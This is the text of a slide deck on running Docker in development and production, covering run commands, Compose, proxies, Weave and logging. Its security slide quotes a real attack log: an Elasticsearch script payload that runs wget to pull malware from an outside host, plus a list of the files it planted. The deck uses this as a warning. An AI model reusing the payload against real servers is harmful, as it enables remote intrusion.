Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
@Ben_Hall / Blog.BenHall.me.uk
WHO AM I?
Agenda
doger.io
Container
https://www.docker.com/whatisdocker/
Native CPU
Native Memory
Native IO
No Pre-Allocation
No Performance Overheard
Milliseconds to launch
Still fully isolated
Everything is a container
New Starters
Docker Compose
Node.js
> docker run -it --rm
-w /usr/app
-v $(pwd):/usr/app
-v $(pwd)/d_node_modules:/usr/app/node_modules
-p 3000:3000
node:0.10.38
bash
RStudio
> docker run -d -p 8787:8787 rocker/rstudio
['chrome', 'firefox'].forEach(detectBrowser);
https://github.com/BenHall/docker-selenium-example
Building Images
Order Matters
Size Matters
Go Lang Development
Environment
> docker run -it --rm
-w /go/src/github.com/myapp
-v $(pwd)/vendor/github.com/:/go/src/github.com/
-v $(pwd):/go/src/github.com/myapp
golang:1.4
bash
copy:
docker create --name tmp warden-dev
docker cp tmp:/go/bin/app $(shell pwd)/app
docker rm tmp
build-release:
docker build t ocelotuproar/warden
Private Registry
Like hub.docker.com
Just a container
Docker in Production
Immutable
Disposable Container Pattern
Persisting Data
> docker run v <host-dir>:<container-dir> image
-v /opt/docker/elasticsearch:/data
-v /opt/docker/mysql:/var/lib/mysql
-v /docker/scrapbook/uploads:/app/public/uploads
-v $(PWD):/host
-v /var/log/syslog:/var/log/syslog
Docker Compose
> docker-compose up -d
> cat docker-compose.yml
web:
image: ocelotuproar/katacoda
volumes:
- /opt/projects/katacoda/data:/usr/src/app/data
- /opt/docker/katacoda/db:/usr/src/app/ocelite-db
- /var/run/docker.sock:/var/run/docker.sock
ports:
- 3000
environment:
VIRTUAL_HOST: 'katacoda.com,*.katacoda.com'
NODE_ENV: 'production
restart: always
Docker Events
Problem: Port 80
Problematic Approach
> docker run -d --name nginx_root
--link blog_benhall-1:blog_benhall-1
--link katacoda-1:katacoda-1
--link scrapbook_web_1:scrapbook_web_1
--link brownbag_web_1:brownbag_web_1
-p 80:80
-v /opt/docker/nginx/www:/data
-v /opt/docker/nginx/sites:/etc/nginx/sites-enabled
-v /opt/docker/nginx/logs:/var/log/nginx
nginx
Nginx Proxy
https://github.com/jwilder/nginx-proxy
https://www.dropbox.com/s/2f6y2frfjafc409/nginx-proxy-optimised.gif?dl=0
-v /var/run/docker.sock:/tmp/docker.sock
VIRTUAL_HOST=my.container.com
// Load Balanced
> docker stop <container for myapp:v2.0>
Not Great.
Weave
> weave launch
> docker run name ws web-server
// second host
> weave launch <host-01 ip>
Weave DNS
> docker run --name ws -d -p 80:80 \
scrapbook/docker-http-server
> docker run --name ws -d -p 80:80 \
scrapbook/docker-http-server
> docker run --name ws -d -p 80:80 \
scrapbook/docker-http-server
> docker run ubuntu ping -c1 ws
ping ws.weave.local (10.0.0.1)
> docker run ubuntu ping -c1 ws
ping ws.weave.local (10.0.0.2)
> docker run ubuntu ping -c1 ws
ping ws.weave.local (10.0.0.3)
Nginx
Wordpress
blog_benhall
Nginx
Varnish
Wordpress
blog_benhall_varnish
blog_benhall
Common Question: Is it
secure?
org.elasticsearch.search.SearchParseException: [index][3]:
query[ConstantScore(*:*)],from[-1],size[1]: Parse Failure [Failed to parse
source
[{"size":1,"query":{"filtered":{"query":{"match_all":{}}}},"script_fields":{"exp":{"s
cript":"import java.util.*;\nimport java.io.*;\nString str = \"\";BufferedReader br
= new BufferedReader(new
InputStreamReader(Runtime.getRuntime().exec(\"wget -O /tmp/xdvi
http://<IP Address>:9985/xdvi\").getInputStream()));StringBuilder sb = new
StringBuilder();while((str=br.readLine())!=null){sb.append(str);}sb.toString();"
}}}]]
http://blog.benhall.me.uk/2015/09/what-happens-when-an-elasticsearch-container-is-hacked/
C /bin
C /bin/netstat
C /bin/ps
C /bin/ss
C /etc
C /etc/init.d
A /etc/init.d/DbSecuritySpt
A /etc/init.d/selinux
C /etc/rc1.d
A /etc/rc1.d/S97DbSecuritySpt
A /etc/rc1.d/S99selinux
C /etc/rc2.d
A /etc/rc2.d/S97DbSecuritySpt
A /etc/rc2.d/S99selinux
C /etc/rc3.d
A /etc/rc3.d/S97DbSecuritySpt
A /etc/rc3.d/S99selinux
C /etc/rc4.d
A /etc/rc4.d/S97DbSecuritySpt
A /etc/rc4.d/S99selinux
C /etc/rc5.d
A /etc/rc5.d/S97DbSecuritySpt
A /etc/rc5.d/S99selinux
C /etc/ssh
A /etc/ssh/bfgffa
A /os6
A /safe64
C /tmp
A /tmp/.Mm2
A /tmp/64
A /tmp/6Sxx
A /tmp/6Ubb
A /tmp/DDos99
A /tmp/cmd.n
A /tmp/conf.n
A /tmp/ddos8
A /tmp/dp25
A /tmp/frcc
A /tmp/gates.lod
A /tmp/hkddos
A /tmp/hsperfdata_root
A /tmp/linux32
A /tmp/linux64
A /tmp/manager
A /tmp/moni.lod
A /tmp/nb
A /tmp/o32
A /tmp/oba
A /tmp/okml
A /tmp/oni
A /tmp/yn25
C /usr
C /usr/bin
A /usr/bin/.sshd
A /usr/bin/dpkgd
A /usr/bin/dpkgd/netstat
A /usr/bin/dpkgd/ps
A /usr/bin/dpkgd/ss
http://blog.benhall.me.uk/2015/09/what-happens-when-an-elasticsearch-container-is-hacked/
--log-opt max-size=50m
--log-opt max-file=100
ELK + LogSpout
> docker run -d \
-p 8000:8000 \
-v /var/run/docker.sock:/tmp/docker.sock \
--name logspout \
gliderlabs/logspout:master syslog://192.168.99.100:5000
https://github.com/benhall/docker-elk
Health Endpoints
Debugging
Scaling
www.katacoda.com
Summary
Batteries included but removable
Thank you!
@Ben_Hall
Ben@BenHall.me.uk
Blog.BenHall.me.uk
www.Katacoda.com